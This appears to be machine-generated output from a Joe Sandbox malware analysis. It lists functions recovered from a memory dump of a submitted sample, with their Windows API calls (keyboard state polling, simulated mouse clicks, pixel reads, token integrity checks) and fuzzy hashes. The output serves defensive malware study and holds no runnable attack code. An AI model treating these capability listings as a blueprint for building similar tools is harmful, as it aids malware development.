Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 974c0d7346d29ec3ba777eae65862e7594a5d0c86d942486fddaf8dc4fdf0c0f
Instruction ID: c8acdbe5b39d73c72cfc0b37ddc76cbd94936b9e3b2cf19ccc819f3b1a647846
Opcode Fuzzy Hash: 974c0d7346d29ec3ba777eae65862e7594a5d0c86d942486fddaf8dc4fdf0c0f
Instruction Fuzzy Hash: FF511735A04209DFEB01EFA8C8849ADB7F5EF09320F058099E895AB352D739EA45CF50

Function 00FFE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FFE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FFE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FFE687

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FFE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FFE6B4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 2db3d8f3c1dc26d82ca6a2c7be10e96c8af71306e6ae2fdad34037319a401159
Instruction ID: 02de296d477331a4ee691235644e24e2d4a761ee1b64847ee3f2a86742ba13bd
Opcode Fuzzy Hash: 2db3d8f3c1dc26d82ca6a2c7be10e96c8af71306e6ae2fdad34037319a401159
Instruction Fuzzy Hash: 50511A35A00109DFDF01EF68C981AAEBBF5EF09314B1480A9E949AB361DB75ED11EF50

Function 0101A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8126a8ef6c524acc8c3b7741bd9213dcf156989540364d99f8d58251effd0200
Instruction ID: bd3edb7eea0179db5d3378a95da82349198f888c13287697ced140862cc5f13f
Opcode Fuzzy Hash: 8126a8ef6c524acc8c3b7741bd9213dcf156989540364d99f8d58251effd0200
Instruction Fuzzy Hash: 8E41D335A06284EFE761DE68CC48FA9BFE4EB09360F040195FA95A72D9C738A945CB50

Function 00F92344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F92357
ScreenToClient.USER32(010557B0,?), ref: 00F92374
GetAsyncKeyState.USER32(00000001), ref: 00F92399
GetAsyncKeyState.USER32(00000002), ref: 00F923A7

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: d4be7eca68b66ea26a3cc49aeaafcc3ac8d144bae81993d39fd47a341c02b11a
Instruction ID: 0061ac51c61f6a971adda3ed23aef0c3152da61840d5a496bd37257519c1921f
Opcode Fuzzy Hash: d4be7eca68b66ea26a3cc49aeaafcc3ac8d144bae81993d39fd47a341c02b11a
Instruction Fuzzy Hash: EC418F35A04106FBDF299F68CC45FEDBB74FB05370F20431AE86892294CB799994EB90

Function 00FE63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00FE6433
TranslateMessage.USER32(?), ref: 00FE645C
DispatchMessageW.USER32(?), ref: 00FE6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE6475

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 6524a060be0a89ec6ef22166f1df947716c6833b219cc3ef25370f1bb12129e3
Instruction ID: 6e7cfadbda22c3414b8a861d13ca6c53599967c05e7982826e826f49dace0e49
Opcode Fuzzy Hash: 6524a060be0a89ec6ef22166f1df947716c6833b219cc3ef25370f1bb12129e3
Instruction Fuzzy Hash: 9531C531D0038AAFDB34CEB1DC44BB77BACAB253A0F140165E465C31D5E73A9489EB61

Function 00FE8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00FE8A30
PostMessageW.USER32(?,00000201,00000001), ref: 00FE8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FE8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00FE8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FE8AF8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 068a0008970c0f692aa8f2bddd6fccbbdb219eb83b0e540964e4894d53d75fe6
Instruction ID: 0a665dfb0134b7464656b7273d76d420ab76fbf09ad2085469a291ea2dfad385
Opcode Fuzzy Hash: 068a0008970c0f692aa8f2bddd6fccbbdb219eb83b0e540964e4894d53d75fe6
Instruction Fuzzy Hash: 9F31FF71900259EFCB10DFA8D94CA9E3BB5FB04325F10822AF829E61C0C7B89915EB90

Function 00FEB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00FEB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FEB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FEB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FEB27F
_wcsstr.LIBCMT ref: 00FEB289

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 21d1afadb9074dbe7aa739838cae28d22ad27982dff480e8570f2a321003398e
Instruction ID: e444d0f6316994438680ee7e1034805902375419712f8f92dba2eb3a6e392590
Opcode Fuzzy Hash: 21d1afadb9074dbe7aa739838cae28d22ad27982dff480e8570f2a321003398e
Instruction Fuzzy Hash: 6C2126326042417BEB269B7ADC49EBF7B9CDF49760F008129F904DA191EF69DC40B7A0

Function 0101B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

GetWindowLongW.USER32(?,000000F0), ref: 0101B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0101B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0101B1CF
GetSystemMetrics.USER32(00000004), ref: 0101B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01000E90,00000000), ref: 0101B216

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 1e0bfafeaaa6e7812d569dd9d40133434da38d42b3cd0c3cbe79212880faa0e4
Instruction ID: 639542aa5470894aad71f0726ad7a4bb8e54622e2ab0dfddc51ff82783f7917a
Opcode Fuzzy Hash: 1e0bfafeaaa6e7812d569dd9d40133434da38d42b3cd0c3cbe79212880faa0e4
Instruction Fuzzy Hash: 8321D631A10211AFDB609E7CDC04A6A3BB4FB05321F114764FEB2D31E4D7399414CB80

Function 00FE9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FE9320

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FE9352
__itow.LIBCMT ref: 00FE936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FE9392
__itow.LIBCMT ref: 00FE93A3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: b9f2a7a35ce62cc722ba0aee8e5ce87f00057b992be25b117360b21ae10ff074
Instruction ID: db20dea7249a88b9e4ab54994750e71db2d3588c95f666346d6635ee5b5b6109
Opcode Fuzzy Hash: b9f2a7a35ce62cc722ba0aee8e5ce87f00057b992be25b117360b21ae10ff074
Instruction Fuzzy Hash: B221D731B04348AFDB20AEA69C85EEE7BADEB88720F044025FD45DB1C1D6F58D45A7A1

Function 01005A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01005A6E
GetForegroundWindow.USER32 ref: 01005A85
GetDC.USER32(00000000), ref: 01005AC1
GetPixel.GDI32(00000000,?,00000003), ref: 01005ACD
ReleaseDC.USER32(00000000,00000003), ref: 01005B08

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 73173c0790d06152a61243ad3bc1fa7f31e66aa353a7cc6d0a9d5c92dadff707
Instruction ID: a3975fc1ff55fbe0a1220c9628805c798a7d52e3d97a2615dd0a0d43a92c321c
Opcode Fuzzy Hash: 73173c0790d06152a61243ad3bc1fa7f31e66aa353a7cc6d0a9d5c92dadff707
Instruction Fuzzy Hash: 9921A135A00204AFEB10EF68DC84AAABBE5EF49350F04846DF949D7351CE79AD45DB90

Function 00F912F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F9134D
SelectObject.GDI32(?,00000000), ref: 00F9135C
BeginPath.GDI32(?), ref: 00F91373
SelectObject.GDI32(?,00000000), ref: 00F9139C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 068006e1d5c59880fa42ea8e74496f4634a2e8581f8db32adf253f193a437265
Instruction ID: 25456d98ecd9ac00caf2a13fe86a25e19ccce149c87f1dae243615860c530981
Opcode Fuzzy Hash: 068006e1d5c59880fa42ea8e74496f4634a2e8581f8db32adf253f193a437265
Instruction Fuzzy Hash: 2F216031C0030AEFEF218F25DD05B6A7BB8FB14321F244266F891A6194D77B9995EF90

Function 00FEBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00FEBCB3
_memcmp.LIBCMT ref: 00FEBCD1
_memcmp.LIBCMT ref: 00FEBCE4
_memcmp.LIBCMT ref: 00FEBCFC
_memcmp.LIBCMT ref: 00FEBD14

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: acb53ff2ad5796b65e1cadf3e869191277ef391e29bbf2716006f89bcb717855
Instruction ID: ef800d82dbbd0c6a67667a06d26b457fa83814b518f9784edefa555f1cf60f5a
Opcode Fuzzy Hash: acb53ff2ad5796b65e1cadf3e869191277ef391e29bbf2716006f89bcb717855
Instruction Fuzzy Hash: 38012872604159BBD210AB579D42FFBB35CEE51398F244424FD049B302FB10DE10FAA1

Function 00FF4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FF4ABA
__beginthreadex.LIBCMT ref: 00FF4AD8
MessageBoxW.USER32(?,?,?,?), ref: 00FF4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FF4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FF4B0A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 64c3079b6c9531d923b0715d643f356e64b41d934c27ccbc99b805acf0ac0820
Instruction ID: accaa597ebecc1c93065f65c583e2f2c3499e6990ccde1a5dc0225bc42d05ba7
Opcode Fuzzy Hash: 64c3079b6c9531d923b0715d643f356e64b41d934c27ccbc99b805acf0ac0820
Instruction Fuzzy Hash: ED114876D04208BBC7208FA89C04AAB7FACEF86330F144255FA14D3251D67AD9048BA0

Function 00FE8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE821E
GetLastError.KERNEL32(?,00FE7CE2,?,?,?), ref: 00FE8228
GetProcessHeap.KERNEL32(00000008,?,?,00FE7CE2,?,?,?), ref: 00FE8237
HeapAlloc.KERNEL32(00000000,?,00FE7CE2,?,?,?), ref: 00FE823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8255

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 18214e0340398564694bbd83c348ea8381144bdb92b27fe042df913adb8898d5
Instruction ID: f8b9856bcac197fee2a1eacd91245bcbfdc337dd4a2fd3131961e256f54a02f4
Opcode Fuzzy Hash: 18214e0340398564694bbd83c348ea8381144bdb92b27fe042df913adb8898d5
Instruction Fuzzy Hash: 6C018171600245BFDB205FA6DC48D6B7FACEF8A7A4B500569F94DC3210DB368C05EB60

Function 00FE710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?,?,00FE7455), ref: 00FE7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?), ref: 00FE7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE716C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: cb639f592b854cc28e9594f71bcd429c6ab603183ab55d9604f6cfa5d935c860
Instruction ID: 00099f38ba5cb48390dcd224d3eed6a0c4e4692c40700abf97c5863ed74a1802
Opcode Fuzzy Hash: cb639f592b854cc28e9594f71bcd429c6ab603183ab55d9604f6cfa5d935c860
Instruction Fuzzy Hash: 8201DF72A01315BBCB209F65DC44BAA7BACEF447A1F100064FD48D2214E73ADD01ABA0

Function 00FF5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7547c1871f25f73d9927d5cd85ccf70efb0a1d9885a90987517f89e1f6bcc0bd
Instruction ID: 935d4a1e758ca641deadc36db49cf4832cbcb3bca0611056bdd9a5101b33ebb6
Opcode Fuzzy Hash: 7547c1871f25f73d9927d5cd85ccf70efb0a1d9885a90987517f89e1f6bcc0bd
Instruction Fuzzy Hash: 0F015731D01A1EEBCF10EFE4E849AEDBB78BF09B11F400246EA81B2254CB39555497A1

Function 00FE810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8157

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1b85f1af9162f92e75665757dc6e4bb2ebf31da140db40033c44d15e9fbdd087
Instruction ID: 30346b8d1808d6517b9ab045c0aa82bf8094c2d0f98fb59ec6fd7797e541052f
Opcode Fuzzy Hash: 1b85f1af9162f92e75665757dc6e4bb2ebf31da140db40033c44d15e9fbdd087
Instruction Fuzzy Hash: 07F06275640305AFEB212FA5EC88E673BACFF4A7A4B000115F989C6140CB6A9D46EB60

Function 00FEC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00FEC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00FEC20E
MessageBeep.USER32(00000000), ref: 00FEC226
KillTimer.USER32(?,0000040A), ref: 00FEC242
EndDialog.USER32(?,00000001), ref: 00FEC25C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
